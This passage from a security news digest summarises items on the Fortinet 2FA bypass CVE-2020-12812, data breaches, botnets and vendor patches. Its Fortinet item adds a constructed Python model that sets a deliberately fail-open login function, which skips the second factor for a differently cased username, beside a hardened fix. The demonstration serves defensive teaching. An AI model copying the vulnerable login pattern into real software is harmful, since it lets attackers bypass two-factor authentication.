A vulnerability in Fortinet firewalls that has been known since July 2020, CVE-2020-12812, is currently being actively exploited. By exploiting it, attackers can bypass two-factor authentication (2FA) via FortiToken simply by changing the upper and lower case of a username (e.g. "Mmueller" instead of "mmueller"). Particularly at risk are systems that handle local users via a ..
---------------------------------------------
https://www.cert.at/de/aktuelles/2026/1/aktuelle-angriffe-gegen-alte-sicher…
∗∗∗ Nearly 480,000 impacted by Covenant Health data breach ∗∗∗
---------------------------------------------
A cyberattack last year against the Catholic healthcare organization Covenant Health exposed the sensitive information of more than 478,000 people.
---------------------------------------------
https://therecord.media/covenant-health-breach-qilin
∗∗∗ NordVPN Denies Breach After Hacker Claims Access to Salesforce Dev Data ∗∗∗
---------------------------------------------
A hacker using the alias 1011 has claimed to breach a NordVPN development server, posting what appears to…
---------------------------------------------
https://hackread.com/nordvpn-denies-breach-hacker-salesforce-dev-data/
∗∗∗ Setback for software vendor: BSI may criticise security concept as "conspicuous" ∗∗∗
---------------------------------------------
The Cologne Administrative Court rejected a manufacturer's urgent application against an impending official warning, strengthening the BSI's powers to inform the public.
---------------------------------------------
https://heise.de/-11127661
∗∗∗ Security updates: various attacks on QNAP NAS possible ∗∗∗
---------------------------------------------
Given the right preconditions, attackers can attack QNAP network storage devices with far-reaching consequences.
---------------------------------------------
https://heise.de/-11129647
∗∗∗ The Kimwolf Botnet is Stalking Your Local Network ∗∗∗
---------------------------------------------
The story you are reading is a series of scoops nestled inside a far more urgent Internet-wide security advisory. The vulnerability at issue has been exploited for months already, and it’s time for a broader awareness of the threat. The short version is that everything you thought you knew about the security of the internal network behind your Internet router probably is now dangerously out of date.
---------------------------------------------
https://krebsonsecurity.com/2026/01/the-kimwolf-botnet-is-stalking-your-loc…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (tar), Debian (curl and gimp), Fedora (doctl, gitleaks, gnupg2, grpcurl, nginx, nginx-mod-brotli, nginx-mod-fancyindex, nginx-mod-headers-more, nginx-mod-modsecurity, nginx-mod-naxsi, nginx-mod-vts, and usd), Mageia (cups), Red Hat (container-tools:rhel8, go-toolset:rhel8, grafana, and skopeo), and SUSE (dirmngr, fluidsynth, gnu-recutils, libmatio-devel, python311-marshmallow, python312-Django6, rsync, and thunderbird).
---------------------------------------------
https://lwn.net/Articles/1052795/
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 30-12-2025 18:00 − Friday 02-01-2026 18:00
Handler: Michael Schlagenhaufer
Co-Handler: Alexander Riepl
=====================
= News =
=====================
∗∗∗ Over 10K Fortinet firewalls exposed to actively exploited 2FA bypass ∗∗∗
---------------------------------------------
Fortinet released FortiOS versions 6.4.1, 6.2.4, and 6.0.10 in July 2020 to address this flaw (tracked as CVE-2020-12812) and advised admins who couldn't immediately patch to turn off username-case-sensitivity to block 2FA bypass attempts targeting their devices. [..] On Friday, Internet security watchdog Shadowserver revealed that it currently tracks over 10,000 Fortinet firewalls still exposed on the Internet that are unpatched against CVE-2020-12812 and vulnerable to these ongoing attacks ...
---------------------------------------------
https://www.bleepingcomputer.com/news/security/over-10-000-fortinet-firewal…
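This item and the CERT.at item on CVE-2020-12812 in the previous report describe the same mechanism: the password backend matches the username case-insensitively, but the FortiToken assignment is looked up with the exact string the user typed, so a differently cased name passes the password check and finds no token to enforce. The Python below is an added model of that bug class written for this digest; it is not FortiOS code and does not claim to reflect Fortinet's implementation. The user store, the `require_2fa` policy set, the stand-in OTP check and the `Mmueller`/`jdoe` sample accounts are constructed. It shows the fail-open flow beside a hardened one that canonicalises the username before every lookup and fails closed when a user who must have a second factor has none enrolled.

```python
"""Added model of the 2FA bypass class described above: a password backend
that matches usernames case-insensitively combined with a second-factor
store that is keyed by the exact string the user typed. Constructed for
this digest; not FortiOS code, and the users and tokens below are made up."""

import hmac
from dataclasses import dataclass, field


@dataclass
class UserStore:
    # Password backend (stands in for LDAP/RADIUS): compares names case-insensitively.
    passwords: dict[str, str]
    # Second-factor bindings, keyed by the username exactly as it was enrolled.
    tokens: dict[str, str]
    # Users for whom policy mandates a second factor.
    require_2fa: set[str] = field(default_factory=set)

    def check_password(self, username: str, password: str) -> bool:
        for stored_user, stored_pw in self.passwords.items():
            if stored_user.casefold() == username.casefold():
                return hmac.compare_digest(stored_pw, password)
        return False


def check_otp(expected: str, presented: str) -> bool:
    # Stand-in for a real TOTP/FortiToken verification.
    return hmac.compare_digest(expected, presented)


def login_vulnerable(store: UserStore, username: str, password: str, otp: str) -> str:
    """Fail-open flow: the second factor is enforced only if a token is found
    under the username *as typed*. "Mmueller" passes the case-insensitive
    password check but misses the token enrolled for "mmueller"."""
    if not store.check_password(username, password):
        return "denied"
    token = store.tokens.get(username)          # case-sensitive lookup
    if token is None:
        return "granted"                        # treated as "user has no 2FA"
    return "granted" if check_otp(token, otp) else "denied"


def canonical(username: str) -> str:
    """One normalisation applied everywhere a username is used as a key."""
    return username.strip().casefold()


def login_hardened(store: UserStore, username: str, password: str, otp: str) -> str:
    """Same flow with two fixes: every lookup uses the canonical name, and a
    user who must have a second factor but has none is denied (fail closed)."""
    if not store.check_password(username, password):
        return "denied"
    user = canonical(username)
    tokens = {canonical(u): t for u, t in store.tokens.items()}
    must_have_2fa = {canonical(u) for u in store.require_2fa}
    token = tokens.get(user)
    if token is None:
        return "denied" if user in must_have_2fa else "granted"
    return "granted" if check_otp(token, otp) else "denied"


# Constructed sample: one enrolled user and one who should have a token but does not.
STORE = UserStore(
    passwords={"mmueller": "s3cret", "jdoe": "pw"},
    tokens={"mmueller": "123456"},
    require_2fa={"mmueller", "jdoe"},
)

if __name__ == "__main__":
    for fn in (login_vulnerable, login_hardened):
        print(fn.__name__, "Mmueller, no OTP ->", fn(STORE, "Mmueller", "s3cret", ""))
        print(fn.__name__, "jdoe, no token   ->", fn(STORE, "jdoe", "pw", ""))
```

The interim workaround the item reports (turning off username case sensitivity so the device normalises names itself) is the same fix as `canonical()` applied at the configuration layer; the second fix, denying a login when a user covered by the 2FA policy has no token bound, is what stops any future lookup mismatch from degrading silently to password-only authentication.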
∗∗∗ The Kimwolf Botnet is Stalking Your Local Network ∗∗∗
---------------------------------------------
The story you are reading is a series of scoops nestled inside a far more urgent Internet-wide security advisory. The vulnerability at issue has been exploited for months already, and it's time for a broader awareness of the threat. The short version is that everything you thought you knew about the security of the internal network behind your Internet router probably is now dangerously out of date.
---------------------------------------------
https://krebsonsecurity.com/2026/01/the-kimwolf-botnet-is-stalking-your-loc…
∗∗∗ Everest Ransomware Leaks 1TB of Stolen ASUS Data ∗∗∗
---------------------------------------------
On December 2, 2025, Hackread.com exclusively reported that the Everest ransomware group claimed to have stolen 1TB of sensitive ASUS data, including information related to the company’s AI models, memory dumps, and calibration files. [..] Everest has now leaked the entire dataset online.
---------------------------------------------
https://hackread.com/everest-ransomware-asus-data-leak/
∗∗∗ RondoDox botnet exploits React2Shell flaw to breach Next.js servers ∗∗∗
---------------------------------------------
The RondoDox botnet has been observed exploiting the critical React2Shell flaw (CVE-2025-55182) to infect vulnerable Next.js servers with malware and cryptominers.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/rondodox-botnet-exploits-rea…
∗∗∗ The biggest cybersecurity and cyberattack stories of 2025 ∗∗∗
---------------------------------------------
2025 was a big year for cybersecurity, with cyberattacks, data breaches, threat groups reaching new notoriety levels, and, of course, zero-day flaws exploited in breaches. Some stories, though, were more impactful or popular with our readers than others. This article explores 15 of the biggest cybersecurity stories of 2025.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/the-biggest-cybersecurity-an…
∗∗∗ Hong Kong’s newest anti-scam technology is over-the-counter banking ∗∗∗
---------------------------------------------
Hong Kong’s banks have a new weapon against scams: Accounts that require customers to visit a branch to access their funds.
---------------------------------------------
https://go.theregister.com/feed/www.theregister.com/2025/12/31/hong_kong_an…
∗∗∗ How AI made scams more convincing in 2025 ∗∗∗
---------------------------------------------
Several AI-related stories in 2025 highlighted how quickly AI systems can move beyond meaningful human control.
---------------------------------------------
https://www.malwarebytes.com/blog/news/2026/01/how-ai-made-scams-more-convi…
∗∗∗ VVS Discord Stealer Using Pyarmor for Obfuscation and Detection Evasion ∗∗∗
---------------------------------------------
Discord is a social messaging and communications platform that has become a popular target for malware, like VVS stealer. VVS stealer is designed to steal a victim's Discord information and browser data. [..] The stealer also achieves persistence by automatically installing itself on startup. It operates stealthily by displaying fake error messages and capturing screenshots.
---------------------------------------------
https://unit42.paloaltonetworks.com/vvs-stealer/
∗∗∗ Snipping the Long Tail of Shai-Hulud 2.0 ∗∗∗
---------------------------------------------
Wiz Research reveals the data behind Shai-Hulud 2.0's long tail, the massive gap in cloud credential rotation, a potential link to the Trust Wallet incident, and how we finally "snipped the tail" on a month of ongoing infections.
---------------------------------------------
https://www.wiz.io/blog/snipping-the-long-tail-of-shai-hulud-2-0
∗∗∗ RMM Abuse in a Crypto Wallet Distribution Campaign ∗∗∗
---------------------------------------------
A professionally written announcement email titled “Eternl Desktop Is Live — Secure Execution for Atrium & Diffusion Participants” is currently circulating within the Cardano community. [..] This campaign exhibits multiple overlapping indicators consistent with supply-chain abuse and trojanized wallet distribution, combined with pre-positioning techniques that leverage RMM tools to establish persistent access.
---------------------------------------------
https://malwr-analysis.com/2025/12/31/rmm-abuse-in-a-crypto-wallet-distribu…
=====================
= Vulnerabilities =
=====================
∗∗∗ Gambio: important Security Update 2025-12 v1.0.0 for all versions up to GX5 v5.0.1.0 ∗∗∗
---------------------------------------------
We have just released a new security update package, which we urgently recommend all shop operators install. Important: users of the Gambio Cloud do not need to do anything; all shops have already been fully secured by us! [..] Please understand that we will not describe any details that could serve attackers as a blueprint for an attack.
---------------------------------------------
https://www.gambio.de/forum/threads/wichtiges-security-update-2025-12-v1-0-…
∗∗∗ QNAP Security Advisories 3 Jan ∗∗∗
---------------------------------------------
QNAP has released 7 new security advisories.
---------------------------------------------
https://www.qnap.com/en-us/security-advisories
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (smb4k), Fedora (direwolf, gh, usd, and webkitgtk), Slackware (libpcap and seamonkey), and SUSE (kepler).
---------------------------------------------
https://lwn.net/Articles/1052600/